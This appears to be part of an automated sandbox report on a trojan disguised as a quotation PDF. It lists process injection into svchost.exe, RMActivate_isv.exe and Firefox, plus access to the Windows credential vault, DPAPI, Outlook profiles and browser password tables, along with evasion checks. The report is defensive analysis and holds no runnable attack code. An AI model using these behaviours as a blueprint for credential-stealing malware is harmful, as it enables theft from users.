                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034F0CF2
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035A0CB5
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034ED34C
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B132D
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0354739A
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0351B2C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035A12ED
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035052A0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035CB16B
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034EF172
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0353516C
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0350B1B0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035070C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035AF0CC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B70E9
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BF0E0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BF7B0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B16CC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B7571
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0359D5B0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034F1460
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BF43F
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BFB76
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03575BF0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0353DBF9
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0351FB80
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BFA49
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B7A46
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03573A6C
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035ADAC6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03545AA0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0359DAAC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035A1AA3
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03509950
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0351B950
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03595910
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0356D800
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035038E0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BFF09
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03501F92
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BFFB1
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03509EB0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B1D5A
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03503D40
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B7D73
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0351FDC0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03579C32
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BFCF2
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E11B6011_2_02E11B60
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E0CAB011_2_02E0CAB0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E0CCD011_2_02E0CCD0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E0AD5011_2_02E0AD50
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E133C011_2_02E133C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E133BD11_2_02E133BD
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E151C011_2_02E151C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E2B80011_2_02E2B800
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EE2EC11_2_033EE2EC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033E019E11_2_033E019E
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EE7CC11_2_033EE7CC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EE59B11_2_033EE59B
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EE43311_2_033EE433
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033ECB3811_2_033ECB38
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033ED86311_2_033ED863
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033ED89811_2_033ED898
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: String function: 00445AE0 appears 65 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: String function: 0356EA12 appears 86 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: String function: 03535130 appears 58 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: String function: 0357F290 appears 105 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: String function: 03547E54 appears 102 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: String function: 034EB970 appears 277 times
                Source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298695264.00000000045BD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation request -30112024_pdf.exe
                Source: Quotation request -30112024_pdf.exe, 00000002.00000003.1296967343.00000000043C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation request -30112024_pdf.exe
                Source: Quotation request -30112024_pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/8
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0044AF6C GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | File created: C:\Users\user~1\AppData\Local\Temp\aut77F7.tmp
                Source: Quotation request -30112024_pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3131128904.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003056000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003031000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1892153485.0000000003056000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Quotation request -30112024_pdf.exe | ReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | File read: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                Source: unknown | Process created: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Process created: C:\Windows\SysWOW64\RMActivate_isv.exe "C:\Windows\SysWOW64\RMActivate_isv.exe"
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Process created: C:\Windows\SysWOW64\RMActivate_isv.exe "C:\Windows\SysWOW64\RMActivate_isv.exe"
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xvYhLzczmazJ.exe, 0000000A.00000000.1561536330.00000000000EE000.00000002.00000001.01000000.00000005.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1722910301.00000000000EE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298534176.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, Quotation request -30112024_pdf.exe, 00000002.00000003.1299779489.0000000004490000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1546649019.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1544927146.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1641739098.0000000003165000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.000000000365E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1644453148.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298534176.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, Quotation request -30112024_pdf.exe, 00000002.00000003.1299779489.0000000004490000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1641673492.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1546649019.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1544927146.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, RMActivate_isv.exe, 0000000B.00000003.1641739098.0000000003165000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.000000000365E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1644453148.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rmactivate_isv.pdb source: svchost.exe, 00000007.00000003.1605760726.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1605855367.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576053827.000000000420D000.00000004.00000001.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576936987.00000000042AA000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: rmactivate_isv.pdbGCTL source: svchost.exe, 00000007.00000003.1605760726.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1605855367.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576053827.000000000420D000.00000004.00000001.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576936987.00000000042AA000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.00000000288EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.00000000288EC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0040EBD0 LoadLibraryA,GetProcAddress
                Source: Quotation request -30112024_pdf.exe | Static PE information: real checksum: 0xa961f should be: 0xefb8d
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00416CB5 push ecx; ret 2_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00414129 push ebx; iretd 7_2_00414136
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00422192 push ss; ret 7_2_0042219A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0041EEFA push ebx; iretd 7_2_0041EF05
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00411766 push ebp; retf 7_2_00411767
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00402FB0 push eax; ret 7_2_00402FB2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03C0225F pushad ; ret 7_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03C027FA pushad ; ret 7_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03C309AD push ecx; mov dword ptr [esp], ecx 7_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03C0283D push eax; iretd 7_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03C01368 push eax; iretd 7_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03C01065 push edi; ret 7_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03C018F3 push edx; iretd 7_2_03C01906
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 11_2_034F09AD push ecx; mov dword ptr [esp], ecx 11_2_034F09B6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 11_2_02E0E7B3 push ebp; retf 11_2_02E0E7B4
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 11_2_02E1BF47 push ebx; iretd 11_2_02E1BF52
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 11_2_033EC327 pushad ; ret 11_2_033EC328
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 11_2_033E046A push ds; ret 11_2_033E0475
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | API/Special instruction interceptor: Address: 326329C
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened / queried: C:\Program Files (x86)\VMware Workstation\Fuxm8.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03C7096E rdtsc
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | API coverage: 4.1 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe TID: 1876 | Thread sleep count: 41 > 30
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe TID: 1876 | Thread sleep time: -82000s >= -30000s
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe TID: 5528 | Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe TID: 5528 | Thread sleep time: -34500s >= -30000s
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
